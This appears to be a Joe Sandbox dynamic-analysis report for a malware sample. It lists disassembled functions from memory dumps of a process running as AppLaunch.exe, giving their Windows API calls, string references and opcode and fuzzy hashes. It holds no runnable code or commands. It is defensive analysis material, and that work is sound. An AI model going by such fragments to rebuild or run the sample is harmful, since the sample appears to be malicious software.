Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9c5d7688ab6bc660ff66454253c29576d9f89555024d445c1079f7796682bc0a
Instruction ID: 0b897a759a7cbd4a9d8280e4f84e80b2b6693519846ffdec822fcce1be722ac5
Opcode Fuzzy Hash: 9c5d7688ab6bc660ff66454253c29576d9f89555024d445c1079f7796682bc0a
Instruction Fuzzy Hash: 2D51EFB2600603AFDB298F54D841BBE77E4EF54714F18452DE906976B1EB71EC81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001562B7 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00155E9B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00153D6A,?,00000000,-00000008), ref: 00155F47

GetLastError.KERNEL32 ref: 0015631B
__dosmaperr.LIBCMT ref: 00156322
GetLastError.KERNEL32(?,?,?,?), ref: 0015635C
__dosmaperr.LIBCMT ref: 00156363

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: a22fdd4962c1c1c9bffe482c5680dacbfb4eae1a5f5531168cfe12e4109cacea
Instruction ID: e58e48205e2ef1ca952d7543d1dc0f5ca94efd9c11bd58d67d153c47325352d8
Opcode Fuzzy Hash: a22fdd4962c1c1c9bffe482c5680dacbfb4eae1a5f5531168cfe12e4109cacea
Instruction Fuzzy Hash: A721BE71604205EF8B60AFA2D8C186AB7A9FF203627508529FC39DB251DB34ED448BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0014C167 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1393cfb1fa0bfc1c4850e65fc2155a27f9ca22ac21454432f77d2eae9eae317d
Instruction ID: 163b9ff5d2b5619e0a8ad6390f0dfd4906b3f1dde6a73071b6b7bfd61734a2f3
Opcode Fuzzy Hash: 1393cfb1fa0bfc1c4850e65fc2155a27f9ca22ac21454432f77d2eae9eae317d
Instruction Fuzzy Hash: E721A171605205AFDBA0AFB1EC81D6BB7AAEF143647108525F914D7161EBB0EC008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0015724D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00157255

Part of subcall function 00155E9B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00153D6A,?,00000000,-00000008), ref: 00155F47

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0015728D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001572AD

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 5ee48a2cf8b7650142d9a598dfe8a56e6e87e7af20340bff5d3b686a470b5652
Instruction ID: e7f6605674be2efaf829a052b4808cf37fcf8fd607b9af0dcc5b66343eb3f9b1
Opcode Fuzzy Hash: 5ee48a2cf8b7650142d9a598dfe8a56e6e87e7af20340bff5d3b686a470b5652
Instruction Fuzzy Hash: 4811A1B1909619FF6B212B71BCCECBF69ACDE9A39AB100425FC159A240FF24CD4542B1

Uniqueness

Uniqueness Score: -1.00%

Function 0015B955 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0015A447,00000000,00000001,00000000,00149E6D,?,0015116F,00149E6D,00000000,00000000), ref: 0015B96C
GetLastError.KERNEL32(?,0015A447,00000000,00000001,00000000,00149E6D,?,0015116F,00149E6D,00000000,00000000,00149E6D,00149E6D,?,001516F6,?), ref: 0015B978

Part of subcall function 0015B93E: CloseHandle.KERNEL32(FFFFFFFE,0015B988,?,0015A447,00000000,00000001,00000000,00149E6D,?,0015116F,00149E6D,00000000,00000000,00149E6D,00149E6D), ref: 0015B94E

___initconout.LIBCMT ref: 0015B988

Part of subcall function 0015B900: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0015B92F,0015A434,00149E6D,?,0015116F,00149E6D,00000000,00000000,00149E6D), ref: 0015B913

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0015A447,00000000,00000001,00000000,00149E6D,?,0015116F,00149E6D,00000000,00000000,00149E6D), ref: 0015B99D

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a58b3c93cf6c0d41310a3f39e3df92de1d23207df34590983453ac27e9c0a026
Instruction ID: 9d4029bbac4b1e9d4f2255eb6ec060309a15f94ef08b43e3ddef9e028c3c11e3
Opcode Fuzzy Hash: a58b3c93cf6c0d41310a3f39e3df92de1d23207df34590983453ac27e9c0a026
Instruction Fuzzy Hash: 10F01C36100118FBCF221FE1EC45A9A3F66EF493A2B104015FF299A520D772C860DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0014BEAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0014BF3D

Strings

pow, xrefs: 0014BF15, 0014BF32

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 0d29cbb2cbfb1690378539953b502bae43f0956f6170b496738b0dc4f3d35b83
Instruction ID: 088de8d7ce4b4e37a0695f338b2d77d6b20ad2b85d79a78931b0a32917837657
Opcode Fuzzy Hash: 0d29cbb2cbfb1690378539953b502bae43f0956f6170b496738b0dc4f3d35b83
Instruction Fuzzy Hash: F651CE21A0DA01D6CB157718CDA137A3BA6DB50702F204D58F8E94B2F9EB31CCCD9E86

Uniqueness

Uniqueness Score: -1.00%

Function 0014899D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 001489C2

Strings

MOC, xrefs: 001489D4
RCC, xrefs: 001489DC

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: a50bc24c30485063737dbc1c0a841b5abbb6c72e30df51bcf1323cee399ce641
Instruction ID: 8debb3935da4182b44874a4d5aac04b2622dd7e4863056a644fdc7a050adb479
Opcode Fuzzy Hash: a50bc24c30485063737dbc1c0a841b5abbb6c72e30df51bcf1323cee399ce641
Instruction Fuzzy Hash: 74416A72900209EFCF15DF98CD81AEEBBB5FF48300F28805AFA04A7261D7759951DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00141E60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00145CCD: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,001428A4,?,00168A7C,?,ios_base::failbit set,?,?), ref: 00145D2D

std::_Xinvalid_argument.LIBCPMT ref: 00141E85

Part of subcall function 00142885: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00142891

Strings

string too long, xrefs: 00141E80
ios_base::badbit set, xrefs: 001412B8, 001412DE, 00142062, 0014208D

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.00000000001A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167739824.00000000001A3000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000_41CD.jbxd

Yara matches

Similarity

API ID: ExceptionRaiseXinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: ios_base::badbit set$string too long
API String ID: 2053305529-3021579929
Opcode ID: f05af4693fa742b6e9e0344023d00e12bc991ea13bb8eb37711e5db6b7c2bd07
Instruction ID: e4ce9b7d96869f66eb5832605a5359153b2fff65b1122a3121e0ebdaee96a8b1
Opcode Fuzzy Hash: f05af4693fa742b6e9e0344023d00e12bc991ea13bb8eb37711e5db6b7c2bd07
Instruction Fuzzy Hash: 7DF0E57850020A6BC61CF760C8A696E7395AF60340F904E2CF916DB9B2DB74E9A98302

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AppLaunch.exePID: 4088, Parent PID: 2416COMMON

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	53
Total number of Limit Nodes:	5

Executed Functions

Function 0C970040 Relevance: 8.3, APIs: 1, Strings: 3, Instructions: 1290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.KTL, xrefs: 0C9704DC
ud%f, xrefs: 0C970907
Qk), xrefs: 0C970840

Memory Dump Source

Source File: 00000009.00000002.2402442815.000000000C970000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c970000_AppLaunch.jbxd

Similarity

API ID:
String ID: .KTL$Qk)$ud%f
API String ID: 0-3475216827
Opcode ID: cbff884737b387e60848fb6e4826e52dc330faa94a84074690b919b29bbc38f4
Instruction ID: a635f2ad55625b46f918ea93387a37eb1ed5d61814bd4d32887e8c9ffa856c7b
Opcode Fuzzy Hash: cbff884737b387e60848fb6e4826e52dc330faa94a84074690b919b29bbc38f4
Instruction Fuzzy Hash: 0AE2BCB4E012288FDB65DF28C984B9EBBB5BB89304F1091E9D50DA7350DB31AE85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00D8BEC8 Relevance: 7.9, Strings: 6, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 00D8C576
$^q, xrefs: 00D8C61A
$^q, xrefs: 00D8C182
&#8(, xrefs: 00D8C441
VR~w, xrefs: 00D8BF52
$^q, xrefs: 00D8C226

Memory Dump Source

Source File: 00000009.00000002.2379755556.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d80000_AppLaunch.jbxd

Similarity

API ID:
String ID: &#8($VR~w$$^q$$^q$$^q$$^q
API String ID: 0-1364053099
Opcode ID: e69bfd572f1c441275a0ea83514bb57354e8ba38065813699d4d67283e1046a5
Instruction ID: 2b4e8156d838f3eba8a8e374a4ab5a169cc83edd29cc331bef664bdea59bb228
Opcode Fuzzy Hash: e69bfd572f1c441275a0ea83514bb57354e8ba38065813699d4d67283e1046a5
Instruction Fuzzy Hash: 3222B370E01228CFDB68EF64C891B9EB7B2BF49300F5095E9D409AB254DB359E85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0C972A28 Relevance: 2.9, Strings: 2, Instructions: 355
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1, xrefs: 0C972D08
., xrefs: 0C972C83

Memory Dump Source

Source File: 00000009.00000002.2402442815.000000000C970000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c970000_AppLaunch.jbxd

Similarity

API ID:
String ID: .$1
API String ID: 0-1839485796
Opcode ID: 188346da2a0804b84f97e15e159306f363f847d9e4afbad2b20e0d66e164a099
Instruction ID: 1cfb81192ec1cc4f70ad48d70ad0390598950de698b19a8ead9aef22efb91fb6
Opcode Fuzzy Hash: 188346da2a0804b84f97e15e159306f363f847d9e4afbad2b20e0d66e164a099
Instruction Fuzzy Hash: E6F1D074E01228CFDB68DF69C984B9EBBB2FF89305F1081A9D409A7290DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D079 Relevance: 2.7, Strings: 2, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 00D8D381
LR^q, xrefs: 00D8D132

Memory Dump Source

Source File: 00000009.00000002.2379755556.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d80000_AppLaunch.jbxd

Similarity

API ID:
String ID: LR^q$PH^q
API String ID: 0-4173805542
Opcode ID: f16a9dbf87fb611a93eade20e0a73a7a46d3caa3e102bec9e1596c6c4853ab0a
Instruction ID: 526d0edc97fa08601782ad45b668248436016fea8f566945872d839ac3855b41
Opcode Fuzzy Hash: f16a9dbf87fb611a93eade20e0a73a7a46d3caa3e102bec9e1596c6c4853ab0a
Instruction Fuzzy Hash: 5BA1D574E04228CFDB24DFA5C854B9DBBB2BF89304F5085A9D409AB3A4DB309E85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00D80FD0 Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

$^q, xrefs: 00D812A6

Memory Dump Source

Source File: 00000009.00000002.2379755556.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d80000_AppLaunch.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 5ba48dabb92883bb863e4be1303c7d0c90a5982349d78afad74c90a2a26ad9d6
Instruction ID: a59721306fccce06ba0668e7a8e98d3e86bb47a69e8dd67b878d9a70054292ce
Opcode Fuzzy Hash: 5ba48dabb92883bb863e4be1303c7d0c90a5982349d78afad74c90a2a26ad9d6
Instruction Fuzzy Hash: 22B1C474E01228CFDB64DFA5C850B9DBBB2BF89300F2081A9D409AB354DB359E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0C970FCE Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2402442815.000000000C970000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c970000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4b3a907e4e617cdc05fb75ddfb8345be6f5aeacb2a099e074eb1998fe3cb960
Instruction ID: 2393bae3a0a15007cfdae0f97d99fd70b8c6ae5660f99e6ef902abb06e868ee6
Opcode Fuzzy Hash: d4b3a907e4e617cdc05fb75ddfb8345be6f5aeacb2a099e074eb1998fe3cb960
Instruction Fuzzy Hash: D442D2B4A012288FDB64DF28C984B9DBBB5FB89305F5051E9D60DA7350DB31AE85CF09

Uniqueness

Uniqueness Score: -1.00%

Function 00A3DE9F Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A3E0FE

Memory Dump Source

Source File: 00000009.00000002.2379276166.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_AppLaunch.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 898583393824074e949c5d710e8337dedd15ceb8eb2362b461ad2dda49eefc94
Instruction ID: 0dae301cb8b1f0d34628e28d38b7b90aafecb10eb41e699f1165356df50c32c1
Opcode Fuzzy Hash: 898583393824074e949c5d710e8337dedd15ceb8eb2362b461ad2dda49eefc94
Instruction Fuzzy Hash: FC812670A00B05CFD724DF2AD59179ABBF1BF88304F108A2DE49AD7A90D775E949CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A3899D Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00A38A59

Memory Dump Source

Source File: 00000009.00000002.2379276166.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_AppLaunch.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 081bb78fd2e58756e025faf28ed39bded50b61c9289dccfb625685c052cbbfe4
Instruction ID: a94612fef9841745af14c692bee0a06bd9cced49c2b120b5b7fc796137e77388
Opcode Fuzzy Hash: 081bb78fd2e58756e025faf28ed39bded50b61c9289dccfb625685c052cbbfe4
Instruction Fuzzy Hash: 9941F5B0C00719CFDB24CFA9C84479EBBF5BF45304F24815AE418AB295DB759986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A36EA8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00A38A59

Memory Dump Source

Source File: 00000009.00000002.2379276166.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_AppLaunch.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ecd8d28bc3ddc167b0c5e631fc3effac761e09f0c8071ab935231bff1b062a51
Instruction ID: 8cbaf80e043500a3d7555405f07cc7f3e51c61a43d58fd0b747f7a8a9aeef238
Opcode Fuzzy Hash: ecd8d28bc3ddc167b0c5e631fc3effac761e09f0c8071ab935231bff1b062a51
Instruction Fuzzy Hash: 0541D2B0C00719CFDB24DFA9C944B9EBBF5BF48304F24806AE419AB255DB75A946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A3DBB8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A3E179,00000800,00000000,00000000), ref: 00A3E38A

Memory Dump Source

Source File: 00000009.00000002.2379276166.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_AppLaunch.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5e6d2e4f46d2ea9b6632a066f54dac1fecd8fd96ecc74ca2b48814dab821c263
Instruction ID: 7de0585edc04ea2d245647e45af8180e5be8e612dcc651819869eab4f6e483bf
Opcode Fuzzy Hash: 5e6d2e4f46d2ea9b6632a066f54dac1fecd8fd96ecc74ca2b48814dab821c263
Instruction Fuzzy Hash: A911F3B69003499FDB20CF9AD844BDEFBF4EB48310F10842AE559AB250C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A3E318 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A3E179,00000800,00000000,00000000), ref: 00A3E38A

Memory Dump Source

Source File: 00000009.00000002.2379276166.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_AppLaunch.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8b46912559cb8b7803486cdcf632c16d132e37ec5cd9d49f1a27996da0647528
Instruction ID: ba86927163f6f3fc9e48752228ddf2412bf674107b160a191caf0f38a31fa395
Opcode Fuzzy Hash: 8b46912559cb8b7803486cdcf632c16d132e37ec5cd9d49f1a27996da0647528
Instruction Fuzzy Hash: 6211F9B5D003498FDB10CFAAD484ADEFBF4EB48320F14852EE565A7250C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0C977F24 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,0C9782FE), ref: 0C978406

Memory Dump Source

Source File: 00000009.00000002.2402442815.000000000C970000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c970000_AppLaunch.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f174be93263720f22d10df6bf0c08f1f4ff6bc22ca9b1109a53e22b4a6206523
Instruction ID: a6ef26f7c566aee39d24ce93642f00d8b2a0e9a03d1790b51e1241e3d60d34e7
Opcode Fuzzy Hash: f174be93263720f22d10df6bf0c08f1f4ff6bc22ca9b1109a53e22b4a6206523
Instruction Fuzzy Hash: 8C1123B1D013488FCB20DF9AC848A9EFBF8EB88320F10852AD419B7650D375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0C97839E Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,0C9782FE), ref: 0C978406

Memory Dump Source

Source File: 00000009.00000002.2402442815.000000000C970000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c970000_AppLaunch.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8c2eeaef0ba096255cc710e9c8fb5fff495508064f457267416d659def1a5dc2
Instruction ID: f0bae0200748e0f66db1c61b7fd8092443869de85f6c2af82753d7230c85958d
Opcode Fuzzy Hash: 8c2eeaef0ba096255cc710e9c8fb5fff495508064f457267416d659def1a5dc2
Instruction Fuzzy Hash: D81120B1D013498FCB20CFAAC848ADEFBF4AB88320F10842AD428B7650C374A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D8E5F9 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 00D8E65D

Memory Dump Source

Source File: 00000009.00000002.2379755556.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d80000_AppLaunch.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 856767c2de6248866f7503d1ca47f36a39dd2e04ba6964942b5c60bd2d45940d
Instruction ID: 89719e6526cba85cd2e1f091cf4539c83564d8835136f697c2bc0eec541f8ca4
Opcode Fuzzy Hash: 856767c2de6248866f7503d1ca47f36a39dd2e04ba6964942b5c60bd2d45940d
Instruction Fuzzy Hash: 161133B5800348CFCB10DFAAC889BDEBFF4EB48310F10855AE458A7250C3B4A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D8AD50 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 00D8E65D

Memory Dump Source

Source File: 00000009.00000002.2379755556.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_d80000_AppLaunch.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6d3272719a2ab2a92c0b65067de7269c5ffffea17165022ce8e31fd7dd5d0578
Instruction ID: 5e628f566a0eba0ef2b9d1eedf0e4afbd74ab0a5824a917882772741d3a7361c
Opcode Fuzzy Hash: 6d3272719a2ab2a92c0b65067de7269c5ffffea17165022ce8e31fd7dd5d0578
Instruction Fuzzy Hash: 091106B5800349DFCB10DF99C845BDEBBF8EB48310F108819E558A7250D375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A3E098 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00A3E0FE

Memory Dump Source

Source File: 00000009.00000002.2379276166.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a30000_AppLaunch.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ab6ea79cd737111c52b703ab38392efe2916725a8a7b116d950bd0abc652d742
Instruction ID: 728bd4d3ba8c8eb4c84199d11dfd0b659e7455ddaf088a51d2b8245316174dd7
Opcode Fuzzy Hash: ab6ea79cd737111c52b703ab38392efe2916725a8a7b116d950bd0abc652d742
Instruction Fuzzy Hash: 1F11E0B5C006498FCB10CF9AD844BDEFBF4AB88324F10852AE469A7250D375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0099D774 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2378479896.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_99d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2e2b23c5bbd518f07a4257b4bc64132674c525285f015358f35fa995dce35a
Instruction ID: 3edf0c9c28a04e07ac60f7dea6102f03a92bf5e63e90798e1be1aa53153e0383
